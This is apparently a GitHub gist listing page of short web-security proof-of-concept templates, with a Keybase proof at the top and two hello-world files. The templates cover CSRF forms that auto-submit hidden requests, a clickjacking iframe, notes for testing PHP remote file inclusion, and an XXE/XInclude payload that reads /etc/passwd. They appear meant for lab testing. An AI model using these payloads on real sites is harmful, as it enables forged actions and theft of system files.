Jake Karnes jakekarnes42

Keybase proof

I hereby claim:

  • I am jakekarnes42 on github.
  • I am jakekarnes (https://keybase.io/jakekarnes) on keybase.
  • I have a public key ASCRTEY9DgdyMbIG7PHshYfpHvzbpTh_iv5IFqJtrGxZPQo

To claim this, I am signing this object:

@jakekarnes42
jakekarnes42 / csrf_json_simple.html
Created August 7, 2019 23:07
CSRF PoC HTML for POSTing JSON values
<!--
PoC only. Useful for CSRF involving JSON values. Must actually click button to submit.
Submits a request that looks like the following:
POST /oneliner/ws/vulnerable/oneliners HTTP/1.1
Host: local.1-liner.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
@jakekarnes42
jakekarnes42 / clickjack_template.html
Last active November 1, 2019 21:04
PoC to show a site could be embedded in an iFrame
<!-- Replace the iFrame source with victim URL-->
<html>
<style>
iframe {
width:1000px;
height:500px;
top:0; left:0;
border: 10px solid black;
}
</style>
@jakekarnes42
jakekarnes42 / csrf_json_hidden.html
Created August 7, 2019 23:19
CSRF PoC Example that can be reused. Automatically POSTs a JSON string to a server after a short delay.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
<script type="text/javascript">$(document).ready(function (){
setTimeout(function () { $('#target').submit(); }, 3000);
});</script>
</head>
<body>
@jakekarnes42
jakekarnes42 / csrf_simple_post.html
Created August 11, 2019 18:27
Simple template for POST-based CSRF
<html>
<body>
<!-- Change URL and params below -->
<form method="POST" action="http://owaspbwa/ghost/blogView.php">
<input type="hidden" name="vuln" value="me so dumb"/>
<input type="hidden" name="user" value="admin"/>
<input type="submit" value="Submit">
</form>
</body>
</html>
@jakekarnes42
jakekarnes42 / simple_csrf_automatic.html
Created August 11, 2019 18:32
Simple CSRF template that submits a hidden form automatically
<html>
<head>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
<script type="text/javascript">$(document).ready(function (){
setTimeout(function () { $('#target').submit(); }, 3000);
});</script>
</head>
<body>
<h1>Loading...</h1>
<!-- Change URL and params below -->
@jakekarnes42
jakekarnes42 / hello_world.html
Last active November 12, 2019 19:43
Hello World HTML
<html>
<head></head>
<body>
<h1>Hello world!</h1>
</body>
</html>
@jakekarnes42
jakekarnes42 / hello_world.php
Created August 11, 2019 18:42
Simple PHP hello world
<html>
<head>
<title>PHP Test</title>
</head>
<body>
<?php echo '<p>Hello World</p>'; ?>
</body>
</html>
@jakekarnes42
jakekarnes42 / php_rfi_example_notes.txt
Created August 12, 2019 22:34
Example for testing PHP RFI
$ mkdir evil_files
$ cat > evil_files/phpinfo.txt
<?php
phpinfo();
?>
Next, we need to serve the file. Python has a built in web server module we can use for this.
$ cd evil_files
$ python -m SimpleHTTPServer
@jakekarnes42
jakekarnes42 / xinclude_example.xml
Created August 13, 2019 23:37
Simple example of using XInclude in XXE attack
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>